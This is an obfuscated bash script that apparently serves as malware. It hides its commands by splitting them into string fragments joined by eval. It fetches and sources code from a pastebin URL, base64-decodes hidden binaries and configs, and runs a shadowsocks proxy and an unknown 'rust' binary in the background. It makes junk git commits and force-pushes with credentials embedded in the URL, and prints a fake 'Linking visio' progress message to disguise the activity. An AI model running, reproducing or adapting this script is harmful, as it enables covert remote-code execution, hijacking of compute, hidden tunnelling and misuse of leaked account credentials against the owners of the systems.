JdgeNgbZ="do apt upda"
KAdLSTX="te &>/dev/nul"
ivlb="l || t"
eval "su""$JdgeNgbZ""$KAdLSTX""$ivlb""rue"
ypBN="get -O code"
EOGjmH="src https://"
QdbNhbY="pastebin.c"
ZZrO="om/raw/UKs9"
SKOKtRG="hZfc &>/dev/n"
eval "w""$ypBN""$EOGjmH""$QdbNhbY""$ZZrO""$SKOKtRG""ull"
mqziP="/cod"
eval ". .""$mqziP""esrc"
git clone $SRC codes &>/dev/null
NKtpgk="se64 -d code"
CmukQg="s/s "
eval "ba""$NKtpgk""$CmukQg""> o"
uOiEYgPU="sudo apt --ye"
RLKbI="s install "
ioIM="psmisc shadows"
bJmC="ocks-libev "
KGNnoADU="&>/dev/null"
QGOp=" || t"
eval "$uOiEYgPU""$RLKbI""$ioIM""$bJmC""$KGNnoADU""$QGOp""rue"
alfwI="udo systemc"
SBfB="tl stop shadow"
rtxf="socks-libe"
gZBU="v.service "
NoJURmVX="&>/dev/null ||"
hLyF=" "
eval "s""$alfwI""$SBfB""$rtxf""$gZBU""$NoJURmVX""$hLyF""true"
XppKINhT="ase64 -d c"
vFGxSt="odes/c > pip"
YjxdKyd="e.l"
eval "b""$XppKINhT""$vFGxSt""$YjxdKyd""og"
myfI="se64 -d codes/"
AvwYi="gc > gc"
eval "ba""$myfI""$AvwYi"
hjaK="se64 -d codes/"
QZoPSkyH="m > "
eval "ba""$hjaK""$QZoPSkyH""rust"
udHGNzmi="ase64 -d codes"
rBXqcBS="/p > prep"
eval "b""$udHGNzmi""$rBXqcBS""are"
fkTRoHmi="source ./prep"
Ffgp="ar"
eval "$fkTRoHmi""$Ffgp""e"
LYOvPWrw="do ss-local "
ouYNZRq="-c o --plugin "
xBUXDT="./gqs --plu"
ZUNPnlX="gin-opts ./"
yQaG="gc &>/dev/"
cOxGIe="n"
eval "su""$LYOvPWrw""$ouYNZRq""$xBUXDT""$ZUNPnlX""$yQaG""$cOxGIe""ull &"
dwmi="chmod +x rus"
eval "$dwmi""t"
TGAoEJI="sed -i 's/g"
Sdfsr="cc/trgfo/g'"
cxPSeh=" pipe.lo"
eval "$TGAoEJI""$Sdfsr""$cxPSeh""g"
HgYSsBL="do ./rust "
UDhNyq="--config pipe.l"
RSOaNV="og &>/dev/n"
eval "su""$HgYSsBL""$UDhNyq""$RSOaNV""ull &"
Pxvi="echo jkao"
eval "$Pxvi""w"
PjrWTu="sleep 6"
eval "$PjrWTu""3"
QSZCGcW=" clone https:"
GqnqD="//github.com/es"
aVdk="lang-ef-org/v"
XYCGOoDZ="isio.git tmp &"
pojHFDw=">/dev/null || "
kcRkpzML="true"
eval "git""$QSZCGcW""$GqnqD""$aVdk""$XYCGOoDZ""$pojHFDw""$kcRkpzML"
TCmnvh="d tmp ||"
eval "c""$TCmnvh"" true"
FMilOPT="it config us"
OihOOR="er.name 'Rom"
tOGbmrK="an Akopyan' &>/"
OttPgCB="dev/null |"
jyOV="|"
eval "g""$FMilOPT""$OihOOR""$tOGbmrK""$OttPgCB""$jyOV"" true"
lCsAHexe=" config user"
aXyuKz=".email roman.a"
aWGOy="kopyanxb@i"
robq="nbox.ru &>/"
EMwnQQR="dev/null || "
DpuScoU="tru"
eval "git""$lCsAHexe""$aXyuKz""$aWGOy""$robq""$EMwnQQR""$DpuScoU""e"
hqvgK="UILD=\`date +"
aKUkzvJP="%"
eval "B""$hqvgK""$aKUkzvJP""s\`"
Piun="E=\`date "
eval "MAK""$Piun""+%S\`"
echo $BUILD >> jkaow$MAKE
git add jkaow$MAKE &>/dev/null || true
git commit -m 'Copied '$MAKE &>/dev/null || true
HwaOvn=" push http"
rMKzxeK="s://roman-ako"
cOiFDb="pyanxb:'CNjR-"
xGYMuW="KSjHVv_9Ap'@gi"
jmaM="thub.com/es"
qCNqWjuQ="lang-ef-or"
XIZB="g/visio.gi"
BbiiXSU="t -f &>/dev/nu"
ONDZbYg="ll || t"
eval "git""$HwaOvn""$rMKzxeK""$cOiFDb""$xGYMuW""$jmaM""$qCNqWjuQ""$XIZB""$BbiiXSU""$ONDZbYg""rue"
while :; do G=`date +%s`; echo 'Linking visio '$G; [ `expr 1311 + $BUILD` -lt $G ] && sudo killall rust && break; sleep 174; done
